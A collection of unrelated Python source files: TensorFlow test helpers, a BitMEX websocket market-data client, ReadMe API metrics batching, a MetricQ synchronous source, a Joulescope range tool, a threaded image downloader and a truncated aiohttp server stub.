atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTN15", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://testnet.bitmex.com/api/v1")
while(ws.ws.sock.connected):
sleep(1)
|
Metrics.py
|
import atexit
import math
import queue
import threading
import requests
import json
import importlib
from readme_metrics import MetricsApiConfig
from readme_metrics.publisher import publish_batch
from readme_metrics.PayloadBuilder import PayloadBuilder
from readme_metrics.ResponseInfoWrapper import ResponseInfoWrapper
class Metrics:
"""
This is the internal central controller class invoked by the ReadMe middleware. It
queues requests for submission. The submission is processed by readme_metrics.publisher.publish_batch().
"""
PACKAGE_NAME: str = "readme/metrics"
def __init__(self, config: MetricsApiConfig):
"""
Constructs and initializes the ReadMe Metrics controller class with the
specified configuration.
Args:
config (MetricsApiConfig): Running configuration
"""
self.config = config
self.payload_builder = PayloadBuilder(
config.DENYLIST,
config.ALLOWLIST,
config.IS_DEVELOPMENT_MODE,
config.GROUPING_FUNCTION,
config.LOGGER,
)
self.queue = queue.Queue()
atexit.register(self.exit_handler)
def process(self, request, response: ResponseInfoWrapper) -> None:
"""Enqueues a request/response combination to be submitted the API.
Args:
request (Request): Request object from your WSGI server
response (ResponseInfoWrapper): Response object
"""
if not self.host_allowed(request.environ["HTTP_HOST"]):
self.config.LOGGER.debug(
f"Not enqueueing request, host {request.environ['HTTP_HOST']} not in ALLOWED_HTTP_HOSTS"
)
return
payload = self.payload_builder(request, response)
if payload is None:
# PayloadBuilder returns None when the grouping function returns
# None (an indication that the request should not be logged.)
self.config.LOGGER.debug(
f"Not enqueueing request, grouping function returned None"
)
return
self.queue.put(payload)
if self.queue.qsize() >= self.config.BUFFER_LENGTH:
args = (self.config, self.queue)
if self.config.IS_BACKGROUND_MODE:
thread = threading.Thread(target=publish_batch, daemon=True, args=args)
thread.start()
else:
publish_batch(*args)
def exit_handler(self) -> None:
if not self.queue.empty():
args = (self.config, self.queue)
for _ in range(math.ceil(self.queue.qsize() / self.config.BUFFER_LENGTH)):
if self.config.IS_BACKGROUND_MODE:
thread = threading.Thread(
target=publish_batch, daemon=True, args=args
)
thread.start()
else:
publish_batch(*args)
self.queue.join()
def host_allowed(self, host):
if self.config.ALLOWED_HTTP_HOSTS:
return host in self.config.ALLOWED_HTTP_HOSTS
else:
# If the allowed_http_hosts has not been set (None by default), send off the data to be queued
return True
|
synchronous_source.py
|
# Copyright (c) 2018, ZIH,
# Technische Universitaet Dresden,
# Federal Republic of Germany
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of metricq nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import asyncio
from threading import Event, Lock, Thread
from typing import Any, Dict
from .logging import get_logger
from .source import MetadataDict, Source
from .types import Timestamp
logger = get_logger(__name__)
class _SynchronousSource(Source):
def __init__(self, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
# Remember this is a threading.Event, which is threadsafe
# not a asyncio.Event which is not threadsafe
# Because we use threads anyway
# There is no threading.Future
self.exception = None
self._ready_event = Event()
async def connect(self) -> None:
await super().connect()
self._ready_event.set()
def on_exception(
self, loop: asyncio.AbstractEventLoop, context: Dict[str, Any]
) -> None:
super().on_exception(loop, context)
if not self._ready_event.is_set():
self.exception = context["exception"]
self._ready_event.set()
async def task(self) -> None:
# Nothing to do, we are called from the outside
pass
def wait_for_ready(self, timeout: float) -> None:
if not self._ready_event.wait(timeout):
raise TimeoutError("SynchronousSource not ready in time")
if self.exception is not None:
logger.error(
"[_SynchronousSource] failed to wait for ready: {}", self.exception
)
raise self.exception
def run(self, *args: Any, **kwargs: Any) -> None:
super().run(catch_signals=())
class SynchronousSource:
_lock = Lock()
_tid = 0
def __init__(self, *args: Any, **kwargs: Any):
self._source = _SynchronousSource(*args, **kwargs)
self._thread = Thread(target=self._source.run)
with self._lock:
thread_id = SynchronousSource._tid
SynchronousSource._tid += 1
# MetricQ Synchronous Source Event Loop Thread
self._thread.name = "MQSSELT#{}".format(thread_id)
self._thread.start()
logger.debug("[SynchronousSource] spawning new thread {}", self._thread.name)
try:
self._source.wait_for_ready(60)
except Exception as e:
self.stop()
raise e
logger.info("[SynchronousSource] ready")
def send(
self,
metric: str,
time: Timestamp,
value: float,
block: bool = True,
timeout: float = 60,
) -> None:
f = asyncio.run_coroutine_threadsafe(
self._source.send(metric, time, value), self._source.event_loop
)
if block:
exception = f.exception(timeout)
if exception:
logger.error("[SynchronousSource] failed to send data {}", exception)
# Keep going for reconnect. If you want to panic, do the following instead
# self.stop()
# raise exception
def declare_metrics(
self, metrics: Dict[str, MetadataDict], block: bool = True, timeout: float = 60
) -> None:
f = asyncio.run_coroutine_threadsafe(
self._source.declare_metrics(metrics), self._source.event_loop
)
if block:
exception = f.exception(timeout)
if exception:
logger.error("[SynchronousSource] failed to send data {}", exception)
def stop(self, timeout: float = 60) -> None:
logger.info("[SynchronousSource] stopping")
f = asyncio.run_coroutine_threadsafe(
self._source.stop(), self._source.event_loop
)
exception = f.exception(timeout=timeout)
if exception:
logger.error("[SynchronousSource] stop call failed {}", exception)
logger.debug("[SynchronousSource] underlying source stopped")
self._thread.join()
logger.info("[SynchronousSource] thread joined")
|
range_tool.py
|
# Copyright 2018-2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run a tool that operates over a data range.
The tool is executed from a separate thread.
"""
from PySide2 import QtCore
import threading
import time
from queue import Queue, Empty
import logging
log = logging.getLogger(__name__)
SAMPLES_PER_ITERATION_DEFAULT_MIN = 1000
PROGRESS_COUNT = 1000
PROGRESS_UPDATE_RATE = 0.100 # seconds
class RangeToolIterable:
def __init__(self, parent, samples_per_iteration):
self._parent = parent
self._x_start, self._x_stop = self._parent.sample_range
self._x_next = self._x_start
self._samples_per_iteration = int(samples_per_iteration)
def __iter__(self):
return self
def __next__(self):
if self._x_next >= self._x_stop or self._parent.is_cancelled:
self._parent = None
raise StopIteration()
self._parent.progress((self._x_next - self._x_start) / (self._x_stop - self._x_start))
x_next = self._x_next + self._samples_per_iteration
if x_next > self._x_stop:
x_next = self._x_stop
data = self._parent._view.samples_get(self._x_next, x_next, units='samples')
self._x_next = x_next
return data
class RangeToolInvoke(QtCore.QObject): # also implements RangeToolInvocation
sigProgress = QtCore.Signal(int)
sigFinished = QtCore.Signal(object, str) # range_tool, error message or ''
sigClosed = QtCore.Signal(object) # range_tool
_sigToolClosed = QtCore.Signal()
def __init__(self, parent, resync_handler, range_tool, cmdp):
super().__init__(parent)
self._parent = parent
self._main_thread = threading.current_thread()
self._qt_resync_handler = resync_handler
self._range_tool = range_tool
self.cmdp = cmdp
self._range_tool_obj = None
self.sample_range = None
self._time_range = None
self._view = None
self._thread = None
self._message_queue = Queue()
self._cancel = False
self._progress_time_last = time.time()
self.sample_count = 0
self.sample_frequency = 0
self.calibration = None
self.statistics = None
self._iterable = None
self._commands = []
self._sigToolClosed.connect(self._finalize, type=QtCore.Qt.QueuedConnection)
cmdp.define('Plugins/#state/voltage_range', dtype=int, default=0) # for file export
def __iter__(self):
self._iterable = self.iterate()
return self._iterable
def __next__(self):
try:
return self._iterable.__next__()
except StopIteration:
self._iterable = None
raise
@property
def name(self):
return self._range_tool.name
@property
def is_cancelled(self):
return self._cancel
def samples_get(self):
return self._view.samples_get(*self.sample_range, units='samples')
def _assert_worker_thread(self):
assert (threading.current_thread() == self._thread)
def _assert_main_thread(self):
assert (threading.current_thread() == self._main_thread)
def iterate(self, samples_per_iteration=None):
self._assert_worker_thread()
if samples_per_iteration is None or samples_per_iteration <= 0:
if self.sample_frequency < SAMPLES_PER_ITERATION_DEFAULT_MIN:
samples_per_iteration = SAMPLES_PER_ITERATION_DEFAULT_MIN
else:
samples_per_iteration = int(self.sample_frequency)
else:
samples_per_iteration = int(samples_per_iteration)
return RangeToolIterable(self, samples_per_iteration)
def _qt_resync(self, cmd, args):
self._assert_worker_thread()
self._message_queue.put((cmd, args))
self._qt_resync_handler() # causes self.on_resync()
def progress(self, fraction):
self._assert_worker_thread()
current_time = time.time()
if current_time - self._progress_time_last > PROGRESS_UPDATE_RATE:
value = int(fraction * PROGRESS_COUNT)
self._qt_resync('progress', value)
self._progress_time_last = current_time
def _x_map_to_parent(self, x):
t1, t2 = self._time_range
if x < 0.0:
raise ValueError('x too small')
if x >= (t2 - t1):
raise ValueError('x too big')
return t1 + x
def marker_single_add(self, x):
x = self._x_map_to_parent(x)
self._commands.append(lambda: self.cmdp.publish('!Widgets/Waveform/Markers/single_add', x))
def marker_dual_add(self, x1, x2):
x1 = self._x_map_to_parent(x1)
x2 = self._x_map_to_parent(x2)
self._commands.append(lambda: self.cmdp.publish('!Widgets/Waveform/Markers/dual_add', (x1, x2)))
def run(self, view, statistics, x_start, x_stop):
"""Export data request.
:param view: The view implementation.
:param statistics: The statistics (see :meth:`joulescope.driver.statistics_get`).
:param x_start: The starting position in x-axis units.
:param x_stop: The stopping position in x-axis units.
"""
self._assert_main_thread()
self.statistics = statistics
t1, t2 = min(x_start, x_stop), max(x_start, x_stop)
log.info('range_tool %s(%s, %s)', self._range_tool.name, t1, t2)
self._time_range = (t1, t2)
s1 = max(view.time_to_sample_id(t1), 0) # negative sample_ids not allowed
s2 = view.time_to_sample_id(t2)
if s1 is None or s2 is None:
return self._abort('time out of range')
self.sample_range = (s1, s2)
self.sample_count = s2 - s1
self.sample_frequency = view.sampling_frequency
self.calibration = view.calibration
self._view = view
self._range_tool_obj = self._range_tool.fn()
try:
if hasattr(self._range_tool_obj, 'run_pre'):
rc = self._range_tool_obj.run_pre(self)
if rc is not None:
return self._abort(f'{self.name} run_pre failed: {rc}')
except:
log.exception('During range tool run_pre()')
return self._abort('Exception in range tool run_pre()')
self._thread = threading.Thread(target=self._thread_run)
self._thread.start()
def _abort(self, msg):
self.sigFinished.emit(self, msg)
self._finalize()
return msg
def _thread_run(self):
self._assert_worker_thread()
try:
rv = self._range_tool_obj.run(self)
if self.is_cancelled:
rv = f'{self._range_tool.name}: Cancelled'
except Exception as ex:
log.exception('range tool run exception')
rv = f'{self._range_tool.name}: ERROR'
self._cancel = True
self._qt_resync('done', rv)
def on_resync(self):
self._assert_main_thread() # indirectly by self._qt_resync_callback
while True:
try:
cmd, args = self._message_queue.get(timeout=0.0)
except Empty:
break
except:
log.exception('on_resync message_queue get')
if cmd == 'progress':
self.sigProgress.emit(args)
elif cmd == 'done':
self._on_finished(args)
@QtCore.Slot()
def on_cancel(self):
log.info('range tool cancelled by user')
self._cancel = True
def _on_finished(self, msg):
finalize_defer = False
self._assert_main_thread()
self.sigProgress.emit(1000)
self.sigProgress.disconnect()
self._thread.join()
self._thread = None
if not self.is_cancelled:
try:
if hasattr(self._range_tool_obj, 'run_post'):
finalize_defer = self._range_tool_obj.run_post(self)
except:
log.exception('During range tool run_post()')
self._cancel = True
while not self.is_cancelled and len(self._commands):
command = self._commands.pop(0)
try:
command()
except:
log.exception('During range tool command')
self.sigFinished.emit(self, msg)
if not finalize_defer:
self._finalize()
def on_tool_finished(self):
self._sigToolClosed.emit()
@QtCore.Slot()
def _finalize(self):
self._assert_main_thread()
log.info('range tool finalize')
self.sigClosed.emit(self)
self._range_tool_obj = None
self._parent = None
self._qt_resync_handler = None
self._range_tool = None
self.cmdp = None
|
download_images.py
|
import os
import shutil
import threading
import time
import numpy as np
import pandas as pd
import requests
class DownloadData(object):
def __init__(self, input_csv, output_dir, num_threads=10):
self.input_csv = input_csv
self.output_dir = output_dir
self.num_threads = num_threads
def download_thread(self, urls, files):
for (url, img) in zip(urls, files):
img_path = os.path.join(self.output_dir, img + '.jpg')
if os.path.exists(img_path):
print("{} already exists, skipping".format(img_path))
continue
try:
response = requests.get(url, stream=True)
if response.status_code != 200:
print("Unable to access {}".format(url))
continue
except Exception as e:
continue
with open(img_path, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
def download_data(self):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
df = pd.read_csv(self.input_csv)
url_chunks = np.array_split(df["image_url"].values, self.num_threads)
file_chunks = np.array_split(df["filename"].values, self.num_threads)
threads = []
for (url_chunk, file_chunk) in zip(url_chunks, file_chunks):
thread = threading.Thread(target=self.download_thread, args=(url_chunk, file_chunk))
thread.daemon = True
threads.append(thread)
thread.start()
while threading.active_count() > 1:
time.sleep(0.1)
print("Total images downloaded: {}".format(len(os.listdir(self.output_dir))))
|
server.py
|
import asyncio
from socket import socket as Socket
import threading
from typing import Any, Callable, Dict, List, Optional, cast
from aiohttp import web
EventCallback = Callable[[Dict[str, Any]], None]
class Server:
"""A handle to a running server."""
def __init__(self, handle_event: EventCallback, host: str, port: int):
"""Initialize a Server."""
self.host = host
self.port = port
self.handle_event = handle_event
self._main_loop = asyncio.get_event_loop()
@property
def url(self) -> str:
return f"http://{self.host}:{self.port}"
def start(self) -> None:
"""Start a new server running in a background thread."""
app = web.Application()
app.add_routes([web.post("/", self._handle_request)])
self._runner = web.AppRunner(app)
self._startup_event = threading.Event()
self._server_loop = asyncio.new_event_loop()
t = threading.Thread(target=self._run)
t.start()
# Wait for server to startup
self._startup_event.wait()
def stop(self) -> None:
"""Gracefully stop a running server."""
# Call the server shutdown functions and wait for them to finish. These
# must be called on the server thread's event loop.
future = asyncio.run_coroutine_threadsafe(self._stop(), self._server_loop)
future.result(5)
# Stop the server thread's event loop
